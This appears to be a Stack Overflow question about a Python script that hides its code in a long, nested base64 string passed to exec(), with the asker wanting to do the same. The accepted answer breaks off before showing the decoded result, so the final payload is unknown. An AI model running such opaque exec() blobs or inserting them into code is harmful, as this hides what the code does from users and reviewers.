# hiding the code by encoding in a python script. how to do it?

Tags: python, python-3.x, base64

found some code in which i can't see its code, but its a python script and works fine

this is the code:

```
import base64
exec(base64.b64decode('aW1wb3J0IGJhc2U2NApleGVjKGJhc2U2NC5iNjRkZWNvZGUoJ2FXMXdiM0owSUdKaGMyVTJOQXBsZUdWaktHSmhjMlUyTkM1aU5qUmtaV052WkdVb0oyRlhNWGRpTTBvd1NVZEthR015VlRKT1FYQnNaVWRXYWt0SFNtaGpNbFV5VGtNMWFVNXFVbXRhVjA1MldrZFZiMG95UmxoTldHUnBUVEJ2ZDFOVlpFdGhSMDE1VmxSS1QxRllRbk5hVldSWFlXdDBTRk50YUdwTmJGVjVWR3ROTVdGVk5YRlZiWFJoVmpBMU1sZHJaRlppTUc5NVVteG9UbGRIVW5CVVZFSjJaREZPVmxwRmRHaFNNREUxVm14U1MxUXhSbGxSYms1aFZsZFNXRmxYZERCVFJrNTBZVWR3VG1KR1ZqVldSM1JPVFZkR1ZrNVlSbFppV0ZKb1ZtcEJNVTFzWkhKYVJscHBUVWM1TlZWdGVHOVViR1JJVlc1Q1ZWWkZTakphUkVaUFZtMUdSbVJIYkZOTlJGWmhWbTB3ZUU1SFJuSk5TR2hVWVd4d1ZsVnNaRk5rYkd4V1drVTFiRll3V2twV1J6RnZWakF4U0dWRVdsaFdSV3cwVldwS1UxWXlUa1poUmtKWVVtdHdUMVpVUWxaTlIxRjRZVE5zVGxkRk5YSldiVFZDVFZad1ZsVnJUbWhTYkc4eVZXMDFUMVZyTVhGV2EzUllZV3RhUkZacldrZGtWMHBJVW14b1UxWnRkekJXYWtvMFlqRlJkMDFWYUZWaGJGcFFWakJvUTJGR1dYZFdWRVpQWWtkNFdGZFljRmRoTVZwWlZXdFdXbFpGU1hkWlYzaFBVbTFPU1ZwR2NHbFdSbHBVVjFkd1EyTXlUa2RVYkdocFVsWktjbFpzYUZOWFZteFhWbFJXVlZKc2JEVlphMXBEVmtVeFdGVnVaRmRTUlVsM1ZqQmtSMVpyT1ZabFJtUk9ZbGhvVWxaWWNFZGhNazVIVlZoa2ExSnRVbkJWTUdRMFVteHNWMXBFVW10aVZWb3dXV3RvVDJGVk1YVlJibVJhWVRGd00xbFhlSFprTWtwR1ZXeE9VMDF1YURaWFYzQkxaREpPU0ZOcmFGQlhSVnB2Vm1wT2IyRkdaSFJOV0U1cVRXdHNOVmt3YUVOaFZrbzJZa2hvV2xadFVUQmFSekZIWkVkS1NWUnRiRTVpYTBvelYxZDBhazVYVGxoU2JHaHNVMFp3YjFsc1pEUmxiRmw1VFZVNWFXSkZOVmRVTVZZMFZqQXhkR1ZHUmxabGExcHlXVEJhVW1ReVVrZGhSMmhYVmtkNFRsWnRjRXRqTVZaSFZGaG9ZVk5GU2xaVVZXaFRWMVpzVjFaVVZsVlNiSEF3V2xWU1QyRnRTbGhsU0hCYVlXdHdNMWt3WkV0VFJUbFpVbTFvVjAweWFHOVdiWFJyWXpKTmVGcElTbFppYTBwd1ZXMDFRMUpzYkZkYVJGSnJZbFZhTUZscmFFOWhWVEYxVVc1a1dtRXhjRE5aYkdSSFYwZFdTVmR0YUdsV00yZzJWMWR3UzJReVRraFRhMlJxVWxad2FGUlZaRFJTVmxaeVdraE9hazFyYkRWWk1HaERZVlpLTm1KSWFGcFdiVkV3VjFaYVQxTkhTa2xVYld4T1ltdEtNMWRYZEdwT1YwNVlVbXhvYkZJd1dsaFZha28wWld4WmVXUkdUbXBTTUhCSVdUQldWMkZHV1hwaFJFcGFWbnBHZWxsNlNrcGxWMDVKVVcxc1UySnJTakJYVmxwclRrZFNkRkp1VW1sVFJUVndWRmMxUTJReGJISlhibVJYVmpCYVdWcFZaRWRWTVVsNVpVaHdWMDF1VWxSWk1HUkxVakpPUmxadGFGZE5NbWh2VmxkMGEyTXlUWGhhU0VaU1lsUldWMVpyVm5ka2JHeHlWMjVLYkZZeFNrbGFWV1IzV1ZVd2QyTklaRnBoTWsweFdURmtSMWRIVmtsWGJXaHBWak5vTmxkWGNFdGtNazVJVTJ0b1VGZEZXbTlXYWs1dlRXeHNXRTFZVG1wTmEydzFXVEJvUTJGV1NuVlJiRnBhVm0xUk1GZFdWWGRsVjBwSlZHMXNUbUpyU2pOWFYzUnFUbGRPV0ZKc2FHeFNNRnBVVm1wS1UxTXhWbFZSYkU1cVVqQndTVlF4YUVkaFJsbDZZVVJLV2xaNlJucFpla1pyWTIxR1NWRnRiRk5sYlhnMFYxWmFhMDVIVW5SU2JsSnBVMFUxY0ZSWE5VTmtNV3h5V1hwV2FsWXdXbGxhVldoaFlVZEtXR1ZJY0ZwaGEzQXpXVEJrUzFJeVRrZFdiV2hYVFRKb2IxWkdVa3RqTWsxNVUxaHNhbE5GU25CVmJuQnpaVVpzVjFwRVVscFdhM0JaVjJ0V2QxWlZNVWxWYkd4YVZteFZNVlpGV2xwbFYwcEhVV3hTVGxZeFNqTldhMUpEVFVaWmVWTnJiR0ZUUjNodlZtcE9iMDFzYkZoTldFNXFUV3RzTlZrd2FFTmhWa3AxVVd4YVdsWnRVVEJYVmxwTFUwZEtTVlJzYUdoTlZYQXpWMWQwWVdReFNsaFNiR2hzVWpCYVQxVnFTazVrTVd0M1drVmtWR0Y2VmtwVlZ6RnZWa1phUjFOcVRsZGhhMXBNVlRKNFJtUXhTblJPVlRsVVVsVndkbFpVUmxOVk1sRjRZa1phYUdWclNuRlZiVEZUVmtaU2NtRkZUbWhTYXpWV1ZsYzFhMWRzV2xoak0yUmFUVVp3Y2xadGN6RlRWa1p6WVVaYVYxSnJiM3BXYlhCSFVtc3hTRlJyYUZOaE0wSlFWVEJXUzJJeFZYaFZiRTVyVFZac05GZHVjRU5oYkVsM1YydDBWV0V5YUVSWlZWcFBWbFpXZFZwR1pFNVdXRUpNVmxaU1ExSXlTbkpPVld4U1lsZG9WVlpyV2t0Tk1XUlhWbTVLVGxJd05VaFhhMXBQVldzd2VGZHJNVmRoYTNCNlZsVmFUbVZHY0VsUmJGWk9VMFpLV1ZkV1VrZFVNVVp6WWpOa2FWSldTbE5XYWtwT1pERnJkMWR0ZEdoU1ZGWktWVmN4YjFaR1drZFRhazVZVm14YWVWUlZaRTlUUmtweVkwVTVWRkpWY0haV1ZFWlRWVEpSZUdKR1dtaGxhMHB4VldwQ1lWTXhVbkpoUlU1WVVteHdWbFpYTld0V01ERnpVbGhrV2sxSFVraFZNbk14VTFaR2RHRkdVbGRTYTI5NlZqRmFWMk5yTVVoVWEyaFRZVE5DVUZVd1ZrdGlNVlY0Vld4T2EwMVhlRmRaV0hCRFlXeEtkRlZzWkZWaE1taEVWakJhZDFKV1ZuVmFSbVJPWVRGV00xZFVRbXRTTVU1eVRsVnNVbUpYYUZWV2ExcExUVEZrVjFadVNrNVNNRFZKVlcxMGQxUXhUa1pUYlRsV1RWWktWRnBFUm5OV2JVWTJVVzF3VTJKV1NsaFdSM1J2VVRGa1IyTkZXbFZoYTFwVlZGWmFkMDFHY0VkV2FrSlhUV3RXTTFReFZqUldNa3BWVm14V1ZsWnRVbkpWTW5oR1pERktkRTVXVWxkV1IzaE9WbTB3ZDJWRk1WZFVXR2hZWW10d1ZsUlZhRk5YUm14VlVWUldWVkpzY0RCYVJWcERWa1V4VjJOSWJGZFNSVWwzVm1wS1JtUXdPVlpsUm1ScFZrWmFWbFpYZEd0ak1rMTRXa2hXVkdKclNuQlZiVFZEVW14c1YxcEVVbHBXYTNCSldXdG9UMWRIUlhoVGJtUmFZVEZ3TTFWc1pFZFhSMVpJVW14T1UwMXVhRFpXYWtwM1VUSktjMVJzV2xCV1dHaFlXV3hTUm1WR1ZqWlNiVVpxWWtaR00xcEZXbXRoUlRGRllrVXhWMkpVUlhkV1ZWcE9aVVprZFZOc1ZrNVRSa3BaVjFaU1FrNVdVa2RYYmxKUFZteEtVMVpzYUZOVE1WWlZVV3RrYVdKRk5WZFdSM1JMV1ZVeFNHVkZWbFpXTTFKSVZsZHplRk5IVmtaV2JGcFhZa1p3VlZaV1pIcGxSVFZ6Vld4c1lWSlVWbGRVVlZaM1VURmFjbGR0UmxSTldFSjVWR3hhVjFWc1dsbFZhM1JhVm14YWVsa3dXazVsUmtwMVdrWlNhVkpZUWtkV1JsWnJZVEpHUjFkcVdsZGhhelZvVlcweGIxVXhiSEZSYmxwc1VqRmFSbFpYY3pGV01ERkpVVzVDVjFKc1dsUmFWekZYWTJzeFYyRkZOVmROU0VKT1ZrWmFVMUV5U25OV2JrNWFaV3RhVDFWdE5VTlhiRlY0V2tkMFdGSnNjRlpaYTFwclZqRlplV1ZGVWxaTmJtaE1WV3RhUjFaV1pISmpSa3BPWVhwVmVsWldVa3BOVmxWNVZXNVNVMWRIZUZoWmJYaGhVekZXY2xWclRtbGlSM2hZVjFod1IyRXdNWE5UYkhCWFZtMU5NVlY2UVhoWFZuQTJVV3hXVjJKV1NrMVdNV1I2WlVaS1dGUlljR3BTVkZaWVdsZDBZV05HVlhwalJWcHJUVmM1TkZVeWVHOVVNVnBHVTIxb1YwMUdXbnBaYlhoaFkyeGFWVlpzVmxOaE0wSllWa2QwYTJFeFZuUlNhbHBwVW14d1ZWWnNXa3ROYkdSeFVXNWtUMVl3VmpOYVJXUnZWVEF4VjJOSVdsZE5ibEpvVlZSR1lXTXhTblZSYkVwWFVqTm9URlpVUW05VU1WSkhVbGhvVldFelVsUlZha0p6VGxaU2MxVnJUbHBXYkc4eVZteG9hMVpXU25OalJsSlZZa2RTVUZVd1dtRlhSMHBIVVcxb1YxWldjRE5XYWtaaFlqRkZlVlZZYkZSaE1taHdWV3BPUTFsV1dYZFhhM1JyVFZkNGVGVXhVa05oTWtwV1YycEdWMUo2Vm1oWlZtUkhaRlpTZEU1V2FGZFNXRUl5VjFaV2ExUXlVbGRWYmxKc1VqTlNWRlZyVmxkT1JtUnlWbTEwV0dKV1NrZFVNVlpUVmtaa1JrNVZkRnBoTVhCb1ZHMTRhMk15UmtaalIzUlRZVEZ3V2xZeWRHdE9SMFpZVTI1T1UySnJTbFpVVnpFMFVrWnNjMVp1VG1waVJsb3dXVlZrYzFaR1NuVlJhazVZVm0xb2VWUnJaRmRXYlZaSlVteE9XRkpzY0ZCV1ZsSkRVakpTYzFkcldtRlRSVFZ5Vm1wR1MxZHNaSFZqUjNSVVlrVndlbFpzVWs5V1JscFhWMnRvWVZKc2NETlZNVnBQWkZaa2RHRkdaRTVXVm5BeFZtdGtORlJyTVVoV2ExcHNVMFZhVkZaclpGTlRNVlowWTNwR1ZVMVdTa2hXYlRGM1ZERmFWVlpVU2xkU00wMHhWVEo0UzFadFNYcGhSbkJYWWxaRmQxZFdVa05OTWxaSFVtNU9VMkpHY0c5WlZFWmFaVVphUlZKc1RsTmlWa1l6VkZaU1lXRkhWbkpPVlRWYVZucEdjbFJyV2xOa1YwcEpVMjFvVjFkSGFFWldWRW93WXpKR1ZrMUlaRTlUUjFKVlZtcE9RMDFzWkhGUmJrNXJVakJ3U1ZSc1duZFdNbFp5VjI1d1YxSlhUak5hVldSWFl6Sk9SbUZIZEZSU01VcG9WbXBDVmsxVk5YTlZhMmhPVmxSc2NsbHNWbmRXVmxWNFlVVTVWR0pWVmpOVWJGSkxWMjFLVlZGWWFGcGhNWEI1V2xkNFYyUldSblJpUlRWb1lrVndNMVpyVWt0ak1VWjBVbXhrVlZkSGVGaFpiR2h2WTFaV1dXTkZaRkpOVjNoNVYydG9UMVJ0U2tsUmJGWldUVmRvVUZVeU1VWmtNV1IxVW14b1YxSllRbGxYYTFKTFZURktSazFXV2xoaVYzaHdWbXhTVm1WV1dYbGtSM1JxVFd4S1dGa3dVbGRXUmxwSFkwVjBWbFpGU2pOYVJscDNWMFV4V1ZSdGRFNVNNMmd6VjJ0U1MyTXhWbkpOV0VacFVrVmFhRlZzWkZOWFJuQkhXa1pPVTFKVVJsZFVWbVJIVmpKV2MxZHFSbGhoTVZweVdXMHhSMVpyT1ZsUmJFcFhUVzVvVUZadGRGZGpiVlpYVkd4b1QxTkhVbFZVVm1oRFUxWmFkRTFJYUZSaVJYQlhWR3hXZDFadFNrZFhiRUpYVWxaWmQxVXdXbUZrVmxaelkwWmtUbUp0WnpKV2ExWlhZakZGZVZOcmFGVlhTRUpXVmpCV1MxVldaSEZUVkZacFlrVTFWMWRyV210aE1VbDNZMFZXVmxac1NucFZNbmhLWlVaa2NWRnNhRmRpVmtvMlYxaHdRMVF5VGtkU2JHaGhVak5DVkZSVlduWk5iRlY0Vm14S2EwMVhPVFZXUjNSdlZqSktkVkZ1Um1GU1JXc3hXVzE0VDFac1pIVlViRTVwVW14cmVGWldXbE5qTVU1elUxaG9hVk5GU2xWV2FrbzBVekZXTmxKdE9WUldiVGsyV1ZWYWQyRldUa1pPU0hCWFVrVTFNMVpIYzNoWFJrNXpXa2QwYVZZelozaFdWRXA2VFZkRmVGUnNXbGhpV0ZKWFZXMTRSMDB4VVhoWGEwNVhUV3hhVjFaWGNFOWhWMFp6VjI1a1YxSXpVbnBWYWtaSFl6RmtjMU50YUU1aGVsWXhWbXRTUzJFeVVYaGhNMnhYWVRGYVZGbHNaRFJYVm5CWVpFVmFUazFXU2xwWk1GcHJZVEZLZEZSdWJGWmxhM0JRV1RKemVGWldSblJPVmxwcFVqQTBNRmRXVm10U01XUklWV3BhV0dFelFsVlZNRnBMWld4a1dHVkhkRTlTVkd4WFZrYzFUMkpHU2tkVGF6bFhZV3RLTTFsV1dsTldiRloxWTBkNGFHVnNXbHBXUmxwclUyc3hTRlJyYkdsU2JGcFpWVzF6TVZKR1dsZFhiazVZVm14S01Wa3dXa05oUmxwV1lUTndXRlpGU25KVmFrcFhaRVprYzFOdGNHbFdNMmcyVmxSR1YySXlUa2hUYTFwcFVsZDRiMVpxVG05VE1WVjNXa2hPYWsxVk5WZFpWV2hEWVZaS1dHVkZjRnBXYlZFd1ZUSjRUMU5IU2tsVWJGSlhWakpvTTFkWGRGZGpNVTVZVW14b2JGSllRbFZWYWtvMFpXeFZlRlp0T1dwU01IQkhXV3RXYzJGR1dYcGhSWFJXVFVkU2VsbDZSazlXYkZwMVVXeFNWMDF1YUV4V1dIQkRZekZLUjFKdVNsQldiRnB6Vm14V1ZrMVdWWGhXYlhSWVlsVmFWMWxyYUVOV1JscFpWV3h3VmsxSFVuSlVhMXByVjBkV1NXTkhkRTVTUjNONVZtdGFiMlF5UmxkWGJsWlZZV3RLV1ZWdGN6RlNSbkJZVFZWd2JHSkZOVEZaYTJRMFZtc3hSMU5ZY0ZwaVdFSllXVEJrUzFKdFNrWmFSa3BwVW01Q1ZGZFdVa3RVTWtwelZWaHNZVk5IVW1GVVYzaGhVbXhXZEUxWVRsaFNNVnA1Vld4U1QxWldaRWxSYkVKaFVsWndjbFJzVlhoWFJsWnlZMFpPVjJKSE9UTldha1poWVRKTmVWUllaRkJYUlVwVFdWY3hVMkZHV25WalJXUnNZa2hDZWxWdE5XdFhhekZ6VjJ0YVZtSlVSbnBXTUdSWFkyeEtWVlJzVmxoVFJVcFJWMnRXWVdFd05WWk5WbWhXWVROQ1ZGbFVRbmRrYkdSWlkwVTVWV0Y2Vm5sWmExWnpZVEZPU0ZWdFJsZE5SbFYzVkd4YVJtVnNXbkpsUm1SWFRXeEtlbFpZY0VkV01rcHpZMFphYTFKc2NHaFVWM2hoVkZaYWMxcEhkR2xTYXpFMFZtMHdNVmxXV2xsVmJHUllZV3R3V0ZaRldtRlhSbkJJWlVaU1RsWnNjREZXTW5oWFRVWmFjMkl6YkZkaE0yaFlWbXBLVTJNeFZqWlNiR1JwWWtoQ1YxcEZXbUZaVlRGelYyc3hWMkpIVW5KV2ExcFBWMGRLUm1OSFJrNWhiWGd4VmxSR1YySXhSWGxUYTJoVllXeGFVMVpyWkRSVE1WWnhVMjA1YVUxWGR6SlZNakExWVdzeGNsZHNiRlpOVjJoWVdWWmFXbVZHU2xsaFJsSk9VakZLVFZaSGVHdFZNVTVIVjI1V2FsSllhRlJVVm1RMFRWWmtjMVZyT1ZKTmExcEpWa1pvZDFSc1NqWldhelZXVmtWS1RGbDZSbk5rUlRGV1QxZDBhVk5GU2twWFYzUnZWakZzV0ZadVJsSmliRnBvVlcweGIxWkdiSE5XYWxKWFZtMDVOVlJzVmpSV2F6RjFWVmhvV0Zac1duSldha0V4VWpKT1JtRkhiRk5sYkZwdlZtcENWazFIVVhoVVdHUlZZbXR3VlZSVlpEUlNWbFpZWkVSQ1ZHSkZjRVpWVnpBeFYyeGFXRlZyYUdGV2VrWklWVEJrVjFOV1JuTmpSMmhYVW14c00xWnFTakJWTVZwMFUxaG9hVk5HV25CVmExWkxZVVpaZDFaWWFHdGlSVFZaV1Zod1YyRkdTblJrUkZaWFVucFdhRmxVUm1GT2JGcFpXa1pXVTFKWE9IZFhhMlEwWkcxV1dGTnJiRmRpUlZwUFdWUkdkMlZHV1hoVmEzQlBWbFJHV1ZVeU5WZFdiVXBYWTBoR1ZtRnJOWFpaYWtaM1VteGtWVlpyTlZOTlZuQmhWbFpqZUU1R1ZsZFhhMXBPVjBaS1dWWnRNVzlTUm5CRlUydGtXRkpzV2xaWmEyUkhWVEF4VmxaWWFGZFNiVkl6VldwS1MxSXlTa2xTYkU1WFVtdHdiMVpYZEZkVE1rNVhWVmhvVm1KRk5XOVdiRkpYVW14V2RFMVVRbHBXYTJ3elZGWlNVMWRHV25OVGJVWmhWak5PTkZac1dsTldWbFp6VVd4T1UwMHdOREZXYTFwclpESkdkRk5zYUZSaE1taFVXVzE0WVdGR1VsZFZia3ByVFZoQ1dGbFZWazloVmtweVUyeHdWMVo2Vm5wV01WVjRWakZPYzFWc1VtbFdSVVY0VjJ4a05GRXhXbGRUYmtaaFVtMTRVMVJWYUVOa2JGbDRWV3QwVlUxc1NqQldWM2h2VkRGYVJsTnNjRlpXUlVwNVZGZDRhMUpzVW5KalIyaFhWMFUwTVZadE1ERlZNa1pYVWxod1ZXSnJTbGxWYkZVeFV6RnNObEp0T1ZOU2F6VXdXVlZhZDFSdFJqWldXR3hZWVRGd2NWUldWWGhTTVc5NlkwWmFhR0pHY0hoV1YzQkhXVmRHYzFSc2FHcFRSbkJ6Vld4b2IxTkdjRVZUYms1WVlrZFNSMWt3YUU5WFJscHpZWHBHV2xaNlJrdGFWbHBYWkVkV1IySkdTazVTTTA0MVZtcENWMVF4VFhoaE0yUnBVMFZLYzFWcVFURlRNV3h6VjJ4d1RsSnVRa2RaVlZZd1lVWktkRnBFVmxwTlIyZ3pXVlpWZUdOV1duUmpSbEpYVFRCSmVsWXhVa05qTWsxNVZWaHNhVkpVUmxSWmJURlRaREZrVlZGdGRGTk5iRm93Vmtab2QxbFdUa2RqU0VaYVlrWndURmxYZUU5WFIwNUpXa1p3VGxJemFETldWRVp2VXpKR2MxTllhRmhoYkhCVlZGUktORlJHWkZWUmJrNXJWbFJHU2xrd1pFZFdNREZGVVZoa1YwMVdTa3hXVjNONFkyczVWMkZHV2xkU1ZGWlFWbTF3UTJOdFZuTlZXR2hXWVROQ2MxWnROVU5XYkZWNVRWYzVWV0pHY0VsV1JtaHJWbGRGZUZOc1pGVmhNVlY0Vld4YVIxWldWbkpQVjJocFUwVktNMVpyV210a01XeFlVbGhrVUZaV1dsbFpiR2h2VkRGc1dFMVhkRTlpUlRWWldXdFNUMWxWTVZsUmJHeFZZa2RTTTFsV1ZYaGpNVTUxV2tad2FWWkZXbmhXUkVaWFl6SlNWMWR1UmxKaVZWcHZWbXRXUm1ReFZYaGFTRTVxWWxVMVIxcFZhRk5oUmtsNllVaE9WbUZyV2t4YVJFWnJZMVpPYzFwSGVHbFdhM0JHVmpKd1QxRXhTa2hTYkZwVFlsUldhRlZ0TVc5VVJtdzJVVzVPVTFaVVJrbFhhMlJIWVVaYVdWRnFTbGhoTVZwMlZsUktVbVZXVW5GWGJXeE9UVmhDVDFaR1kzaE9SMUpYV2taa1drMHlhSEJWYkdodlRVWlNWMkZJWkZwV2EydzJWbGR3VDFkR1duUmhSa0poVmpOUk1GcEZXbE5rVm1SMFlrWmFiR0pZYURKV2FrWlRVekZSZVZWdVVsWmlSMmhRVm10V1MxUnNVbGhPVnpsT1lrZFNlRlV5TlU5aE1WcHlVbXBXVm1KVVJqTldNbk40WTFkRmVtRkdjR2xXUmxwVlZqSXdlRlF4VGtoV2EyaG9Vak5TVkZsWE1UQk5NV1J6VjIwNVVrMXJjRWhWVjNoWFZsWmFObEp0UmxkTlJscE1WRlJHYzFZeGNFZFRiRUpYWW10S1NsWnNXbE5XTVZKMFVtNUtXR0pyTlZsV2FrNURVakZTY2xkdVpGTldhMW93V1RCYVExWXhTbkpqU0dSWFVqTlNWRlZxU2tabFIwNUdZVVpXV0ZJeWFHaFdiWFJoWXpBMWMxVnNaRlpoZWxaUVZXeFNjMUpzYkZsalJYUlZZbFZhTUZaSE5WTlhiVVY1Vld0b1lWSnNjREphVlZVMVZsWkdkR1ZHYUZOV1dFSTJWbXhXWVdJeFZYbFdiR1JoVFRKb1YxbHJWVEZVUm14elZXNU9UMkpHV2toV1YzUmhZVlpaZDAxVVZscGhNazE0VmxaYWExTldWbkpsUjBacFVsUldURlpZY0VOak1VcEhVbTVTYTFKdVFsaFpWRUozVjBaVmVGWnNTbXROVnpreldXdG9WMkV4U1hkT1ZYUmFZa1phYUZreFdtdFdWazVWVm1zMVYwMUlRWGhXYkdONFZERk9kRkp1VmxKaVdFSlZWbXBLTkZNeGEzbGxTR1JZVWxSR1dsWkhkRFJpUmxwWlVXNUdWazFYVW5wVWExcHlaREpLU1ZWc1RtbFhSVXBvVmtaa2QyTnRWa2RpU0ZKUFZtczFhRmxzV2t0VGJHeHlZVWQwV2xac2NERlhhMmhEVmxVeGRWRnJaRnBsYTFwMlZXdGFUMlJIUmtoalIyeFhZa2hDTWxacVFsTlRNVkY1Vlc1T2FsSlhhRmhaYkZVeFV6RnNXRTVWVG1oaVJUVlpXbFZTVDJGR1dsbGhSV2hoVWtWd2VsZFdXbXRUUm05NldrWndUbUZyV2tsV01qQjRVakpTVjFWdVZsaGlWM2h3VlRCa1UyUXhXa1ZUYWxKT1RXdGFXRmxWVmxOV1JtUkdUbFp3VmxaRlNqTlVWRVpyVmpKR1JrOVhlR2xXYTFreFZrUkdiMk14YkZkVGJsWmhVMFZLVmxSWE5XNWxiR3hYVm01T2FsSXhTa3BYYTJSSFYwWktWVkpxVmxaTlYxRXdWRlJLUjFkR1pITlZiRkpYVjBaS1RGWldVa05UYlZGNFlrWmtXazB5YUhCVmJHaHZUVlphU0U1Vk9WcFdiR3cwVmpKd1QxWkZNVWRUYTA1aFVteFdORmt3WkVaa01sSkdZMFpLVGxKWVFrdFdiWFJ2WkcxV1NGWnNXbXhUUmtwb1ZXcE9iMk5zVmxWVGJUVnNVbTEwTlZSV1VrOWhhekZJWlVWc1YxWjZSblpaVkVaS1pERmFWVlpzYUdoTmJFcEpWbXhhWVZsV1draFdhMmhRVmpCYVdGUlZXbmRsVmxsNVpVYzVWRTFzV25wVlYzaHZZVVpKZW1GSFJsZGhhMXBNVmxkNFlXTXhXbkpqUjNCVFYwZG5lRlpzWTNoT1IwcEhWR3RrVTJFemFGVldiRlV4VWtacmQxZHVaR3BTYTFwWlZHeFdkMkZYU2taaU0yeFlWbXhLVEZacVNsTldiVXBKVVd4d1RtSldTblpXYlRWM1ZUSktjMVp1UmxKV1JrcFFXVlJCTVdReFZsZGFSM1JVWWtWV00xVXljRTlYYXpGeFVtNXdZVkp0VWxSVmEyUkhVakpPUjFSc1pHaGxhMWw2VmxaU1MyTXhSbk5pTTJScFVsWktVMWx0TVRSVWJHeDBaRVYwVG1KSGR6SldSM2hMWVZVeFdWRnVaRmhoTWsweFdWUkdUMUl4VG5GVWJIQk9UVEJKZVZkclpEQk5NbFpYVTI1V1lWSXlhRmRhVjNoWFRURlplV1ZIZEU5U01IQklXV3BPZDFaSFNsaGhTRUpYVjBoQ1dGUlhlSEpsVlRGWVkwZDBhVkl6WjNkV1JFWlRVVEpLUmsxSWFGUmhhM0JoVm10V2QxZEdjRWRhUjBaWFVsUnNXbGt3WkVkV01sWnpWMjVzVjJFeGNISldha3BYWkVaU1dXSkdUbWxXUmxwdlZtMTBVMk15VGxkaVJscGhVbGRTVDFWdE1XdE9WbXh5V2tSQ1ZsWnRVa3BXVjNRd1ZtMUZlVnBFVGxwaVIxSlVWVEJhWVdOV1ZuUmtSazVUVWxaV05sWnRjRWRXTVZsNFYydG9XR0pIVW5OVk1GcGhWVEZzY2xwRVFtbGlSbHBYVm0xek5WWkhTa1pXYWs1V1lsaFNXRlpYZUdGU2F6RlZWMnhXVjFacmNFaFdNbkJIVWpGS2NrMVdaRlZpUjNoeldXdGFXbVZzVlhsT1dFNXFZa1V4TTFsclZsTlZiRmw1Vld0MFZrMUhVbFJhUkVaM1VteHdTRTVYUms1aE1uY3lWbFpqZUU1SFJsaFNiR2hoVTBaYVdGVnFUbTlqYkZaMFpFUlNWMDFWV25wV01uaExZVVV4Y2s1SWFGaGhNVnAyV1dwQmVGSnRUa1ZXYlhST1lsWktUVlpHWkRCV01sSlhWRmhvVldFd05XOVZha0V3VFZaV1dHTkdUbFpTYlRrMVZERmpNVlpHV2xaT1ZVNVlZV3RLZWxWcldrZGpWbFp5VFZkc2FWWnJhM2hXTVZwaFlqRlZlVk5yV210U1YyaFlXVzE0UzJOR1ZsVlVhemxyVm14R05WbHJaSGRoYlVwV1RsVnNWbUpVVmpOV1JXUlhWMFpTZEU1WFJtaE5WbkJGVmxkMFlWUXhXbk5WYmtwVVlrVTFWRlpzV2xwTmJGcEhZVWhrVW1KV1draFpWVlp2VkRGS05sWnJNVmRXYlUweFdXMTRUMVpzY0VkYVIzQk9ZWHBGTVZadGVGTlpWa3BJVW14YVUySlVWbFZXYkZVeFVrWndSVk5yT1d0U01IQktWbTB4TUZWck1YUmhSa1pYWVRKb2Vsa3llRTVsUjA1R1lVWmthVlpGV2t4V1YzaGhaREZOZUZkcldscGxhMXB2VldwQ2QxZFdXbk5aZWxaVlVteHdTVlF4VmpSV1JscFdUbFZTVm1GclNucFZiRlY0VTBad1NHRkdaR3hpUm13MlZqSjBZV0l4Vm5SVFdHUnBUVEpvY1ZSVVFuZFhiRnBWVVd0MFUwMVhlREJVYkZwUFlWWkpkMDVZWkZaV00wSkVXVlZhU21WR1duUk9WbkJwVmtWYVNWZHJWbUZrTVZwSFVtNUdVbUpYYUZSVVZscGhaRlpaZUZWcmNFOVdNVXBJV1d0b1UxVkdTWGxWYldoYVlrZFJNRnBYZUd0ak1WSnlVMnM1YUUxdWFFWldNVkpQVVRGS1NGSnNXbE5pVkZab1ZXeGtiMVJHVW5OV1ZGWnBZbFZzTlZkclZuZFZhekZHVjI1V1YwMXFRak5VYkdSWFZtMUtSbUpIUms1aVZrcDJWbTAxZDFVeVNuTmlTRVpWWVRBMWNGVnFRbmRrTVd4V1ZtMTBWVlpyVmpWV1YzQlhWa2RLZEdWSWJHRlNiVkpRV2tWYVlXUkhSa2hTYkVwT1lsWkplbFpyVm1wTlZsRjVWVmhzVkdFeWFIQlZhMVpMWTBaV2NWTnFVazVXYlZKNldWVlZNV0ZWTVVsVmJGcGFZV3RKZDFVeWVFWmtNVXAwVGxaU1YxWlVWa1JXTW5CSFpERmtSazFXYUdoU01taFlWRlJLVTJSV1dsWlhhemxTVFVSV1IxcFZhRmRXVjBwMFZXNUNWbUZyYjNwYVJFWk9aREZTY21ORk9XaE5ibWd6VjFkMGExTXhVbk5UYmtaU1lUTm9WVlpzVlRGUk1XUnhVVzVPVTFKcldsbFhhMlIzVlRBeFYySjZTbGhXUlRWNlZWZHpOVlp0U2taaVIwWk9UVlp3ZUZaR1VrTlRNbFp6WWtaa2FGSnJjSEJVVldRMFpVWnNjVk51VGxWU2JIQXhWa2R3VTFkR1NuSlhha3BZWVd0S2VsVnJXa2RYUm5CR1kwWktUbEpZUWtkV2JGSkRWakZaZUZOclpGVmhiRnB2VldwT2IyTkdXbkZSYlVaclRWZDRlVlpIY0ZOaE1ERlpVV3h3VjFKNlZqTldSVnBYVjBVNVdFNVdVbGRXTVVwWlZrZDBZV050VmxkWGJsWmhVak5TVTFSVlZuZFRWbVJYVjIxMFQxSXdjRWhXVnpWVFZVWmFSbE5zVWxwaVJrcDVXbFZhYzJSRk1WZFViRTVwVmxSVmVGWlVTVEZaVjBaMFVtNVNVRlpZYUZWV2JGVXhVVEZrY1ZGdVRsUldhMW94V1d0a2IxWXlWbk5XYWs1V1pXdEtVRmxVUm5KbFZrNTFWRzF3VGsxVmNHRldiRkpEVXpGYWMySkdXbUZTYkhCb1ZGWm9RMDFHYkhKaFJUbGFWbXhXTTFVeWNFZFhSbHAwVkdwU1dtRXhXbnBWTUdSTFUxZE9SbU5HVGs1aWJXUTBWbXBHVTFOck5WaFdiR2hWWW14S1dGbHNhRU5qYkZaVlVXdGthVTFYVWtkWFdIQkRZVmRGZWxWc1RscGhhM0J5VlRKNFJtUXhTblJPVm5CT1lXdGFXVlpHVm10Vk1XUlhWRzVXVjJFelFsUldiVFZEVkVaYWNsWnRjRTVXTUZwSlZUSjRiMVl4V2paaVJURlhWbTFvUkZVd1dsWmxSbHB4VlcxMFYySllhRnBXUmxwclRrWlNSMUpZYkdwbGJYaE1XbFprTUdRd2NEVmhNMEZ1UzFOclBTY3BLUT09Jykp'))
```

i have no idea how this is working, can some one explain what's happening here, and how can i do something like this to my code?

Comment: https://www.base64decode.org/

Comment: It is not encryption, but encoding. Anyone who has the code, will be able to see it. Why do you want to do it? I mean to ask what purpose does it serve?

Comment: I think you can find the solution here:
https://stackoverflow.com/questions/49537095/object-of-type-typeerror-is-not-json-serializable

Answer (score 4, accepted):

For those interested, the code eventually (after about 6 base64 decodes) decodes to this:

```py
